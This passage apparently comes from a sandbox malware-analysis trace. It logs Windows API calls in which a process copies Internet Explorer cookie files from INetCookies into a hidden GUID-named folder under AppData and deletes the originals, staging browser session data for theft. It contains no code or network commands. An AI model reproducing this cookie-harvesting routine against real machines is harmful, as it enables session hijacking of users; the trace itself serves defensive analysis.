lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.207] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.207] StrChrW (lpStart="CDGOWO27.txt", wMatch=0x74c005c) returned 0x0 [0252.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="CDGOWO27.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CDGOWO27.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CDGOWO27.txt" [0252.208] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CDGOWO27.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\cdgowo27.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CDGOWO27.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\cdgowo27.txt"), bFailIfExists=0) returned 1 [0252.217] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CDGOWO27.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\cdgowo27.txt")) returned 1 [0252.219] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.219] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.219] StrChrW (lpStart="Low\\CYHYO8JD.txt", wMatch=0x74c005c) returned="\\CYHYO8JD.txt" [0252.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.219] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.219] StrChrW (lpStart="CYHYO8JD.txt", wMatch=0x74c005c) returned 0x0 [0252.219] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="CYHYO8JD.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CYHYO8JD.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CYHYO8JD.txt" [0252.219] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CYHYO8JD.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\cyhyo8jd.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\CYHYO8JD.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\cyhyo8jd.txt"), bFailIfExists=0) returned 1 [0252.225] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\CYHYO8JD.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\cyhyo8jd.txt")) returned 1 [0252.226] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.226] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.226] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.226] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.226] StrChrW (lpStart="Low\\D9QO3KHK.txt", wMatch=0x74c005c) returned="\\D9QO3KHK.txt" [0252.226] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.227] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.227] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.227] StrChrW (lpStart="D9QO3KHK.txt", wMatch=0x74c005c) returned 0x0 [0252.227] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="D9QO3KHK.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\D9QO3KHK.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\D9QO3KHK.txt" [0252.227] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\D9QO3KHK.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\d9qo3khk.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\D9QO3KHK.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\d9qo3khk.txt"), bFailIfExists=0) returned 1 [0252.232] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\D9QO3KHK.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\d9qo3khk.txt")) returned 1 [0252.233] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.233] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.233] StrChrW (lpStart="Low\\DN8YUCVA.txt", wMatch=0x74c005c) returned="\\DN8YUCVA.txt" [0252.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.233] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.233] StrChrW (lpStart="DN8YUCVA.txt", wMatch=0x74c005c) returned 0x0 [0252.233] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="DN8YUCVA.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DN8YUCVA.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DN8YUCVA.txt" [0252.233] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DN8YUCVA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\dn8yucva.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DN8YUCVA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\dn8yucva.txt"), bFailIfExists=0) returned 1 [0252.370] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DN8YUCVA.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\dn8yucva.txt")) returned 1 [0252.371] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.372] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.372] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.372] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.372] StrChrW (lpStart="Low\\DQI7WAG8.txt", wMatch=0x74c005c) returned="\\DQI7WAG8.txt" [0252.372] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.372] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.372] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.372] StrChrW (lpStart="DQI7WAG8.txt", wMatch=0x74c005c) returned 0x0 [0252.372] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="DQI7WAG8.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DQI7WAG8.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DQI7WAG8.txt" [0252.372] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DQI7WAG8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\dqi7wag8.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DQI7WAG8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\dqi7wag8.txt"), bFailIfExists=0) returned 1 [0252.377] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DQI7WAG8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\dqi7wag8.txt")) returned 1 [0252.378] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.378] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.378] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.378] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.378] StrChrW (lpStart="Low\\DRDF2EZX.txt", wMatch=0x74c005c) returned="\\DRDF2EZX.txt" [0252.378] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.378] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.378] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.378] StrChrW (lpStart="DRDF2EZX.txt", wMatch=0x74c005c) returned 0x0 [0252.378] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="DRDF2EZX.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DRDF2EZX.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\DRDF2EZX.txt" [0252.378] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\DRDF2EZX.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\drdf2ezx.txt"), 